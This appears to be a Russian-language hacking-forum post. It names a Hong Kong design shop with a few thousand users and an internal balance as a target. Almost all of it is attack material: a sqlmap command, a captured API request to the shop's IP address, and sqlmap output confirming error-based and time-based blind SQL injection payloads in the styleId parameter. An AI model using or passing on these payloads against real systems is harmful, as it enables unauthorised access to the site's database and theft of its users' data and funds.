patternbuy какой-то гонконгский шоп дизайнов, внутри 2-3к юзеров и внутрений баланс вроде
Код:
sqlmap.py -r "1.txt" --dbs --random-agent --batch -p styleId --dbms=mysql --technique=E
Код:
POST /api/product/selectPage HTTP/1.1
Host: 47.251.7.2
Content-Length: 103
Access-Control-Allow-Origin: *
Accept: application/json, text/plain, */*
Access-Token:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36
Content-Type: application/json
Origin: http://47.251.7.2
Referer: http://47.251.7.2/store?q=Floral&ids=20010
Accept-Encoding: gzip, deflate, br
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
{"priceRange":"","strSearchKeyword":"Floral","iDisplayStart":null,"iDisplayLength":100,"styleId":20010}
Код:
---
Parameter: JSON styleId ((custom) POST)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: {"priceRange":"","strSearchKeyword":"Floral","iDisplayStart":null,"iDisplayLength":100,"styleId":"20010'||(SELECT 0x436e7547 WHERE 7085=7085 AND GTID_SUBSET(CONCAT(0x716b6a7171,(SELECT (ELT(2544=2544,1))),0x7171787071),2544))||'"}
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"priceRange":"","strSearchKeyword":"Floral","iDisplayStart":null,"iDisplayLength":100,"styleId":"20010'||(SELECT 0x6b704267 WHERE 4307=4307 AND (SELECT 2441 FROM (SELECT(SLEEP(5)))Oghp))||'"}
---
